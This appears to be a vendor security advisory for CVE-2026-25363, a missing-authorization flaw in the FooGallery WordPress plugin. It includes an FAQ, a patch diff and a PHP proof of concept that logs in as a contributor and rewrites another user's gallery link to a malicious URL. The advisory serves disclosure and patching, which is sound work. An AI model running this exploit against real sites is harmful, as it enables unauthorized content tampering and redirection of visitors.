What is CVE-2026-25363?

CVE-2026-25363 is a medium severity vulnerability in the FooGallery plugin for WordPress, affecting versions up to and including 3.1.11. It is due to missing authorization checks, allowing authenticated users with contributor-level access to perform unauthorized actions on gallery metadata.

How does this vulnerability work?

The vulnerability arises from the lack of capability checks in the ajax_get_gallery_details and ajax_save_gallery_details functions. This allows attackers to manipulate gallery metadata by sending crafted requests to the admin-ajax.php endpoint, potentially altering content they should not have access to.

Who is affected by this vulnerability?

Any WordPress site using the FooGallery plugin version 3.1.11 or earlier is at risk. Specifically, authenticated users with contributor-level access or higher can exploit this vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the FooGallery plugin installed. If it is version 3.1.11 or earlier, your site is susceptible to this vulnerability.

How can I fix this vulnerability?

The vulnerability is patched in FooGallery version 3.1.13. Update your FooGallery plugin to this version or later to mitigate the risk associated with CVE-2026-25363.

What does a CVSS score of 4.3 mean?

A CVSS score of 4.3 indicates a medium severity vulnerability. In practical terms, this means that while the vulnerability does not allow full system compromise, it can lead to unauthorized content manipulation, which could have significant implications for site integrity.

What are the potential impacts of this vulnerability?

Exploitation of this vulnerability allows attackers to modify gallery metadata, including custom URLs and targets for images. This could redirect users to malicious sites or alter the intended navigation behavior of gallery images.

How does the proof of concept demonstrate the vulnerability?

The proof of concept illustrates how an attacker can authenticate as a contributor and send a POST request to the vulnerable endpoint with the necessary parameters. It shows how the lack of authorization checks allows manipulation of gallery data owned by other users.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the FooGallery plugin until a patch can be applied. Additionally, review user roles and permissions to limit contributor access temporarily.

Are there any other vulnerabilities associated with FooGallery?

While CVE-2026-25363 is a specific vulnerability, it is important to regularly review and monitor for other vulnerabilities in plugins and themes used on your WordPress site. Keeping all components updated is crucial for security.

What steps should I take after applying the patch?

After updating to the patched version of FooGallery, monitor your site for any unusual activity and review user permissions to ensure only authorized users have access to sensitive functions.

Where can I find more information about this vulnerability?

More information about CVE-2026-25363 can be found in the official CVE database and security advisories from WordPress security sources. It is advisable to stay informed about plugin updates and security patches.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-25363: FooGallery <= 3.1.11 – Missing Authorization (foogallery)

CVE ID CVE-2026-25363

Plugin foogallery

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version 3.1.11

Patched Version 3.1.13

Disclosed February 14, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-25363:
The FooGallery WordPress plugin version 3.1.11 and earlier contains a missing authorization vulnerability in its album gallery details management functions. This flaw allows authenticated attackers with contributor-level permissions or higher to perform unauthorized actions on gallery metadata. The vulnerability has a CVSS score of 4.3, indicating medium severity.

Root Cause:
The vulnerability stems from missing capability checks in the `ajax_get_gallery_details()` and `ajax_save_gallery_details()` functions within `/foogallery/extensions/albums/admin/class-metaboxes.php`. Before the patch, these AJAX handlers only verified the nonce via `check_admin_referer()` but did not validate if the current user had permission to edit the specific album or gallery posts referenced in the request. The functions directly processed `$_POST[‘foogallery_id’]` and `$_POST[‘foogallery_album_id’]` parameters without authorization validation.

Exploitation:
An attacker with contributor-level access can send a POST request to `/wp-admin/admin-ajax.php` with the action parameter set to `foogallery_album_get_gallery_details` or `foogallery_album_save_gallery_details`. The request must include valid nonce `foogallery_album_gallery_details`, a target gallery ID in `foogallery_id`, and an album ID in `foogallery_album_id`. The attacker can modify gallery metadata fields like `custom_url` and `custom_target` for galleries they do not own, potentially altering link destinations and targets for images in other users’ galleries.

Patch Analysis:
The patch introduces a new private method `validate_gallery_details_ajax_context()` that performs comprehensive authorization checks. This method validates both the album and gallery IDs exist as positive integers, then checks `current_user_can(‘edit_post’, $album_id)` and `current_user_can(‘edit_post’, $foogallery_id)` for each respective post. The method returns false if any check fails, preventing unauthorized access. The patch also adds input sanitization for the `custom_url` and `custom_target` fields using `esc_url_raw()` and `sanitize_key()` respectively.

Impact:
Successful exploitation allows authenticated attackers with contributor privileges to modify gallery metadata they should not have access to. This includes changing custom URLs and link targets for images in galleries created by other users. While this does not grant full administrative control, it enables content manipulation that could redirect users to malicious sites or alter the intended navigation behavior of gallery images. The vulnerability represents a privilege escalation within the content management context.

Differential between vulnerable and patched code

Code Diff

--- a/foogallery/extensions/albums/admin/class-metaboxes.php
+++ b/foogallery/extensions/albums/admin/class-metaboxes.php
@@ -408,12 +408,46 @@
 			}
 		}

+		/**
+		 * Validate incoming AJAX context for album gallery details requests.
+		 *
+		 * Reviewers : please note that we cannot check if the gallery belongs to the album, as the user might be in the process of creating an album
+		 *
+		 * @return array|false
+		 */
+		private function validate_gallery_details_ajax_context() {
+			$album_id      = isset( $_POST['foogallery_album_id'] ) ? absint( wp_unslash( $_POST['foogallery_album_id'] ) ) : 0;
+			$foogallery_id = isset( $_POST['foogallery_id'] ) ? absint( wp_unslash( $_POST['foogallery_id'] ) ) : 0;
+
+			if ( $album_id <= 0 || $foogallery_id <= 0 ) {
+				return false;
+			}
+
+			if ( ! current_user_can( 'edit_post', $album_id ) || ! current_user_can( 'edit_post', $foogallery_id ) ) {
+				return false;
+			}
+
+			$album   = FooGalleryAlbum::get_by_id( $album_id );
+			$gallery = FooGallery::get_by_id( $foogallery_id );
+
+			if ( false === $album || false === $gallery ) {
+				return false;
+			}
+
+			return array(
+				'album_id'      => $album_id,
+				'foogallery_id' => $foogallery_id,
+				'gallery'       => $gallery,
+			);
+		}
+
 		public function ajax_get_gallery_details() {
 			if ( check_admin_referer( 'foogallery_album_gallery_details' ) ) {
-				$foogallery_id = intval( $_POST['foogallery_id'] );
-				$gallery = FooGallery::get_by_id( $foogallery_id );
+				$context = $this->validate_gallery_details_ajax_context();

-				if ( false !== $gallery ) {
+				if ( false !== $context ) {
+					$foogallery_id = $context['foogallery_id'];
+					$gallery       = $context['gallery'];
 					$fields = $this->get_gallery_detail_fields( $gallery ); ?>
 					<form name="foogallery_gallery_details">
 					<input type="hidden" name="foogallery_id" id="foogallery_id" value="<?php echo esc_attr( $foogallery_id ); ?>" />
@@ -511,22 +545,39 @@

 		public function ajax_save_gallery_details() {
 			if ( check_admin_referer( 'foogallery_album_gallery_details' ) ) {
-				$foogallery_id = $_POST['foogallery_id'];
-				$gallery       = FooGallery::get_by_id( $foogallery_id );
-				if ( false !== $gallery ) {
-					$fields = $this->get_gallery_detail_fields( $gallery );
-
-					foreach ( $fields as $field => $values ) {
-						//for every field, save some info
-						do_action( 'foogallery_album_gallery_details_save', $field, $values, $gallery );
-					}
+				$context = $this->validate_gallery_details_ajax_context();
+				if ( false === $context ) {
+					wp_send_json_error( array(
+						'message' => __( 'Invalid gallery details request.', 'foogallery' ),
+					), 403 );
 				}
+
+				$gallery = $context['gallery'];
+				$fields  = $this->get_gallery_detail_fields( $gallery );
+
+				foreach ( $fields as $field => $values ) {
+					//for every field, save some info
+					do_action( 'foogallery_album_gallery_details_save', $field, $values, $gallery );
+				}
+
+				wp_send_json_success();
 			}
 		}

 		public function gallery_details_save($field, $field_args, $gallery) {
+			if ( ! isset( $_POST[$field] ) ) {
+				return;
+			}
+
 			if ( 'custom_url' === $field || 'custom_target' === $field ) {
-				$value = $_POST[$field];
+				$value = wp_unslash( $_POST[$field] );
+
+				if ( 'custom_url' === $field ) {
+					$value = esc_url_raw( $value );
+				} else {
+					$value = sanitize_key( $value );
+				}
+
 				update_post_meta( $gallery->ID, $field, $value );
 			}
 		}
--- a/foogallery/extensions/import-export/class-foogallery-import-export.php
+++ b/foogallery/extensions/import-export/class-foogallery-import-export.php
@@ -466,6 +466,12 @@
 		 */
 		public function ajax_generate_export() {
 			if ( check_admin_referer( 'foogallery_gallery_export' ) ) {
+				if ( ! current_user_can( 'manage_options' ) ) {
+					wp_send_json_error( array(
+						'message' => __( 'You do not have permission to export galleries.', 'foogallery' ),
+					), 403 );
+				}
+
 				if ( isset( $_POST['galleries'] ) ) {
 					$galleries = array_map( 'sanitize_text_field', wp_unslash( $_POST['galleries'] ) );
 					echo foogallery_generate_export_json( $galleries ); // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped -- JSON output
--- a/foogallery/foogallery.php
+++ b/foogallery/foogallery.php
@@ -3,7 +3,7 @@
 /*
 Plugin Name: FooGallery
 Description: FooGallery is the most intuitive and extensible gallery management tool ever created for WordPress
-Version:     3.1.11
+Version:     3.1.13
 Author:      FooPlugins
 Plugin URI:  https://fooplugins.com/foogallery-wordpress-gallery-plugin/
 Author URI:  https://fooplugins.com
@@ -24,7 +24,7 @@
         define( 'FOOGALLERY_PATH', plugin_dir_path( __FILE__ ) );
         define( 'FOOGALLERY_URL', plugin_dir_url( __FILE__ ) );
         define( 'FOOGALLERY_FILE', __FILE__ );
-        define( 'FOOGALLERY_VERSION', '3.1.11' );
+        define( 'FOOGALLERY_VERSION', '3.1.13' );
         define( 'FOOGALLERY_SETTINGS_VERSION', '2' );
         require_once FOOGALLERY_PATH . 'includes/constants.php';
         require_once FOOGALLERY_PATH . 'includes/functions.php';
--- a/foogallery/gutenberg/class-foogallery-blocks.php
+++ b/foogallery/gutenberg/class-foogallery-blocks.php
@@ -48,10 +48,16 @@

             $path = FOOGALLERY_PATH . 'gutenberg/assets/blocks';
             $url = FOOGALLERY_URL . 'gutenberg/assets/blocks';
-            $asset = require_once( $path . '.asset.php' );
+            $asset = require( $path . '.asset.php' );
+            if ( ! is_array( $asset ) ) {
+                $asset = array(
+                    'dependencies' => array(),
+                    'version' => false,
+                );
+            }

-            if ( is_array( $asset[ 'dependencies' ] ) ){
-                $asset[ 'dependencies' ][] = 'foogallery-core';
+            if ( isset( $asset['dependencies'] ) && is_array( $asset['dependencies'] ) ){
+                $asset['dependencies'][] = 'foogallery-core';
             }

 			// Scripts.
--- a/foogallery/includes/admin/class-attachment-fields.php
+++ b/foogallery/includes/admin/class-attachment-fields.php
@@ -190,7 +190,15 @@

 		    // If our fields array is not empty
 		    if ( ! empty( $custom_fields ) ) {
-			    // We browse our set of options
+
+				$post_id = absint( $post['ID'] );
+
+				// get out early if we don't have a post id or we don't have permission to edit it.
+				if ( $post_id === 0 || !current_user_can( 'edit_post', $post_id ) ) {
+					return $post;
+				}
+
+				// We browse our set of options
 			    foreach ( $custom_fields as $field => $values ) {
 				    switch ( $values['input'] ) {
 					    case 'text':
@@ -200,18 +208,28 @@
 					    case 'checkbox':
 						    // If this field has been submitted (is present in the $attachment variable)
 						    if ( isset( $attachment[$field] ) ) {
+							    $value = wp_unslash( $attachment[ $field ] );
+
+							    if ( 'foogallery_custom_url' === $field ) {
+								    $value = foogallery_sanitize_attachment_custom_url( $value );
+							    } elseif ( 'foogallery_custom_target' === $field ) {
+								    $value = foogallery_sanitize_attachment_custom_target( $value );
+							    } else {
+									$value = sanitize_text_field( $value );
+								}
+
 							    // If submitted field is empty
 							    // We add errors to the post object with the "error_text" parameter if set in the options
-							    if ( strlen( trim( $attachment[$field] ) ) == 0 && isset( $values['error_text'] ) ) {
+							    if ( strlen( trim( $value ) ) == 0 && isset( $values['error_text'] ) ) {
 								    $post['errors'][ $field ]['errors'][] = __( $values['error_text'] );
 								    // Otherwise we update the custom field
 							    } else {
-								    update_post_meta( $post['ID'], '_' . $field, $attachment[ $field ] );
+								    update_post_meta( $post_id, '_' . $field, $value );
 							    }
 						    }
 						    // Otherwise, we delete it if it already existed
 						    else {
-							    delete_post_meta( $post['ID'], $field );
+							    delete_post_meta( $post_id, '_' . $field );
 						    }
 					        break;

@@ -224,4 +242,4 @@
 		    return $post;
 	    }
     }
-}
 No newline at end of file
+}
--- a/foogallery/includes/admin/class-gallery-attachment-modal.php
+++ b/foogallery/includes/admin/class-gallery-attachment-modal.php
@@ -331,11 +331,13 @@
 				}

 				if ( array_key_exists( 'custom-url', $data ) ) {
-					update_post_meta( $img_id, '_foogallery_custom_url', $data['custom-url'] );
+					$custom_url = foogallery_sanitize_attachment_custom_url( wp_unslash( $data['custom-url'] ) );
+					update_post_meta( $img_id, '_foogallery_custom_url', $custom_url );
 				}

 				if ( array_key_exists( 'custom-target', $data ) ) {
-					update_post_meta( $img_id, '_foogallery_custom_target', $data['custom-target'] );
+					$custom_target = foogallery_sanitize_attachment_custom_target( wp_unslash( $data['custom-target'] ) );
+					update_post_meta( $img_id, '_foogallery_custom_target', $custom_target );
 				}

 				if ( array_key_exists( 'custom-class', $data ) ) {
--- a/foogallery/includes/admin/class-menu.php
+++ b/foogallery/includes/admin/class-menu.php
@@ -118,6 +118,12 @@
 		function create_demo_galleries() {
 			if ( check_ajax_referer( 'foogallery_admin_import_demos' ) ) {

+				if ( ! current_user_can( 'manage_options' ) ) {
+					wp_send_json_error( array(
+						'message' => __( 'You do not have permission!', 'foogallery' ),
+					), 403 );
+				}
+
 				$results = foogallery_create_demo_content();

 				if ( $results === false ) {
--- a/foogallery/includes/class-foogallery-attachment-custom-class.php
+++ b/foogallery/includes/class-foogallery-attachment-custom-class.php
@@ -69,7 +69,7 @@
 		public function load_custom_class_meta( $foogallery_attachment, $post ) {
 			$custom_class = get_post_meta( $post->ID, '_foogallery_custom_class', true );
 			if ( !empty( $custom_class ) ) {
-				$foogallery_attachment->custom_class = $custom_class;
+				$foogallery_attachment->custom_class = foogallery_sanitize_javascript( $custom_class );
 			}
 		}
 	}
--- a/foogallery/includes/class-foogallery-attachment.php
+++ b/foogallery/includes/class-foogallery-attachment.php
@@ -49,8 +49,8 @@
 			$this->caption = trim( $post->post_excerpt );
 			$this->description = trim( $post->post_content );
 			$this->alt = trim( get_post_meta( $this->ID, '_wp_attachment_image_alt', true ) );
-			$this->custom_url = get_post_meta( $this->ID, '_foogallery_custom_url', true );
-			$this->custom_target = get_post_meta( $this->ID, '_foogallery_custom_target', true );
+			$this->custom_url = foogallery_sanitize_attachment_custom_url( get_post_meta( $this->ID, '_foogallery_custom_url', true ) );
+			$this->custom_target = foogallery_sanitize_attachment_custom_target( get_post_meta( $this->ID, '_foogallery_custom_target', true ) );
 			$this->load_attachment_image_data( $this->ID );

 			$this->date = !empty( $post->post_date_gmt ) ? $post->post_date_gmt : $post->post_date;
--- a/foogallery/includes/class-foogallery-cache.php
+++ b/foogallery/includes/class-foogallery-cache.php
@@ -210,6 +210,12 @@
 		function ajax_clear_all_caches() {
 			if ( check_admin_referer( 'foogallery_clear_html_cache' ) ) {

+				if ( ! current_user_can( 'manage_options' ) ) {
+					wp_send_json_error( array(
+						'message' => __( 'You do not have permission!', 'foogallery' ),
+					), 403 );
+				}
+
 				$this->clear_all_gallery_caches();

 				esc_html_e('The cache for all galleries has been cleared!', 'foogallery' );
--- a/foogallery/includes/class-override-thumbnail.php
+++ b/foogallery/includes/class-override-thumbnail.php
@@ -81,6 +81,12 @@
                 );
             }

+			if ( ! current_user_can( 'manage_options' ) ) {
+				wp_send_json_error( array(
+					'message' => __( 'You do not have permission!', 'foogallery' ),
+				), 403 );
+			}
+
             $img_id = isset( $_POST['img_id'] ) ? absint( wp_unslash( $_POST['img_id'] ) ) : 0;

             if ( ! $img_id ) {
--- a/foogallery/includes/functions.php
+++ b/foogallery/includes/functions.php
@@ -1506,6 +1506,48 @@
 }

 /**
+ * Sanitize attachment custom URLs before persisting or rendering.
+ *
+ * @since 1.0.0
+ *
+ * @param string $url
+ * @return string
+ */
+function foogallery_sanitize_attachment_custom_url(  $url  ) {
+    if ( !is_string( $url ) ) {
+        return '';
+    }
+    $url = trim( $url );
+    if ( '' === $url ) {
+        return '';
+    }
+    return esc_url_raw( $url );
+}
+
+/**
+ * Sanitize attachment custom target values against known options.
+ *
+ * @since 1.0.0
+ *
+ * @param string $target
+ * @return string
+ */
+function foogallery_sanitize_attachment_custom_target(  $target  ) {
+    if ( !is_string( $target ) ) {
+        return '';
+    }
+    $target = sanitize_key( $target );
+    if ( '' === $target ) {
+        return '';
+    }
+    $target_options = foogallery_get_target_options();
+    if ( array_key_exists( $target, $target_options ) ) {
+        return $target;
+    }
+    return 'default';
+}
+
+/**
  * Sanitize HTML to make it safe to output. Used to sanitize potentially harmful HTML used for captions
  *
  * @since 1.9.23
@@ -1939,10 +1981,10 @@
         $attachment_args['meta_input']['_wp_attachment_image_alt'] = $attachment_data['alt'];
     }
     if ( isset( $attachment_data['custom_url'] ) && !empty( $attachment_data['custom_url'] ) ) {
-        $attachment_args['meta_input']['_foogallery_custom_url'] = $attachment_data['custom_url'];
+        $attachment_args['meta_input']['_foogallery_custom_url'] = foogallery_sanitize_attachment_custom_url( $attachment_data['custom_url'] );
     }
     if ( isset( $attachment_data['custom_target'] ) && !empty( $attachment_data['custom_target'] ) ) {
-        $attachment_args['meta_input']['_foogallery_custom_target'] = $attachment_data['custom_target'];
+        $attachment_args['meta_input']['_foogallery_custom_target'] = foogallery_sanitize_attachment_custom_target( $attachment_data['custom_target'] );
     }
     if ( isset( $attachment_data['video'] ) && !empty( $attachment_data['video'] ) ) {
         $attachment_args['meta_input']['_foogallery_video_data'] = array(
--- a/foogallery/includes/render-functions.php
+++ b/foogallery/includes/render-functions.php
@@ -130,7 +130,7 @@
 		// get the URL to the attachment page.
 		$url = get_attachment_link( $foogallery_attachment->ID );
 	} elseif ( 'custom' === $link ) {
-		$url = $args['custom_link'];
+		$url = foogallery_sanitize_attachment_custom_url( $args['custom_link'] );
 	} else {
 		$url = $foogallery_attachment->url;
 	}
@@ -606,4 +606,4 @@
 	}
 	$html .= '>';
 	return $html;
-}
 No newline at end of file
+}

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-25363 - FooGallery <= 3.1.11 - Missing Authorization

<?php

$target_url = 'https://vulnerable-site.com/wp-admin/admin-ajax.php';
$username = 'contributor_user';
$password = 'contributor_pass';
$gallery_id = 123; // ID of gallery owned by another user
$album_id = 456; // ID of album containing the gallery

// Step 1: Authenticate and obtain nonce
$login_url = str_replace('admin-ajax.php', 'wp-login.php', $target_url);
$cookie_file = tempnam(sys_get_temp_dir(), 'cve_2026_25363');

// WordPress login requires multiple requests for cookies and redirect
$ch = curl_init($login_url);
curl_setopt_array($ch, [
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_COOKIEJAR => $cookie_file,
    CURLOPT_COOKIEFILE => $cookie_file,
    CURLOPT_HEADER => true,
]);
$response = curl_exec($ch);
curl_close($ch);

// Extract nonce from page (simplified - real implementation would parse HTML)
// For this PoC, we assume the attacker has already obtained a valid nonce
// through normal plugin usage as a contributor
$nonce = 'VALID_NONCE_HERE'; // Obtained from page source

// Step 2: Exploit missing authorization to modify gallery details
$post_data = [
    'action' => 'foogallery_album_save_gallery_details',
    'foogallery_album_id' => $album_id,
    'foogallery_id' => $gallery_id,
    'custom_url' => 'https://malicious-site.com',
    'custom_target' => '_blank',
    '_wpnonce' => $nonce
];

$ch = curl_init($target_url);
curl_setopt_array($ch, [
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => $post_data,
    CURLOPT_COOKIEFILE => $cookie_file,
    CURLOPT_COOKIEJAR => $cookie_file,
]);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Clean up
unlink($cookie_file);

// Step 3: Verify exploitation
if ($http_code === 200 && strpos($response, 'success') !== false) {
    echo "Exploit successful: Modified gallery $gallery_id metadatan";
} else {
    echo "Exploit failed or patchedn";
}

?>

Frequently Asked Questions

What is CVE-2026-25363?
Understanding the vulnerability
CVE-2026-25363 is a medium severity vulnerability in the FooGallery plugin for WordPress, affecting versions up to and including 3.1.11. It is due to missing authorization checks, allowing authenticated users with contributor-level access to perform unauthorized actions on gallery metadata.
How does this vulnerability work?
Mechanics of exploitation
The vulnerability arises from the lack of capability checks in the ajax_get_gallery_details and ajax_save_gallery_details functions. This allows attackers to manipulate gallery metadata by sending crafted requests to the admin-ajax.php endpoint, potentially altering content they should not have access to.
Who is affected by this vulnerability?
Identifying at-risk users
Any WordPress site using the FooGallery plugin version 3.1.11 or earlier is at risk. Specifically, authenticated users with contributor-level access or higher can exploit this vulnerability.
How can I check if my site is vulnerable?
Verifying plugin version
To check if your site is vulnerable, verify the version of the FooGallery plugin installed. If it is version 3.1.11 or earlier, your site is susceptible to this vulnerability.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is patched in FooGallery version 3.1.13. Update your FooGallery plugin to this version or later to mitigate the risk associated with CVE-2026-25363.
What does a CVSS score of 4.3 mean?
Understanding risk levels
A CVSS score of 4.3 indicates a medium severity vulnerability. In practical terms, this means that while the vulnerability does not allow full system compromise, it can lead to unauthorized content manipulation, which could have significant implications for site integrity.
What are the potential impacts of this vulnerability?
Consequences of exploitation
Exploitation of this vulnerability allows attackers to modify gallery metadata, including custom URLs and targets for images. This could redirect users to malicious sites or alter the intended navigation behavior of gallery images.
How does the proof of concept demonstrate the vulnerability?
Technical demonstration
The proof of concept illustrates how an attacker can authenticate as a contributor and send a POST request to the vulnerable endpoint with the necessary parameters. It shows how the lack of authorization checks allows manipulation of gallery data owned by other users.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If immediate updating is not possible, consider disabling the FooGallery plugin until a patch can be applied. Additionally, review user roles and permissions to limit contributor access temporarily.
Are there any other vulnerabilities associated with FooGallery?
Broader security considerations
While CVE-2026-25363 is a specific vulnerability, it is important to regularly review and monitor for other vulnerabilities in plugins and themes used on your WordPress site. Keeping all components updated is crucial for security.
What steps should I take after applying the patch?
Post-update actions
After updating to the patched version of FooGallery, monitor your site for any unusual activity and review user permissions to ensure only authorized users have access to sensitive functions.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2026-25363 can be found in the official CVE database and security advisories from WordPress security sources. It is advisable to stay informed about plugin updates and security patches.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations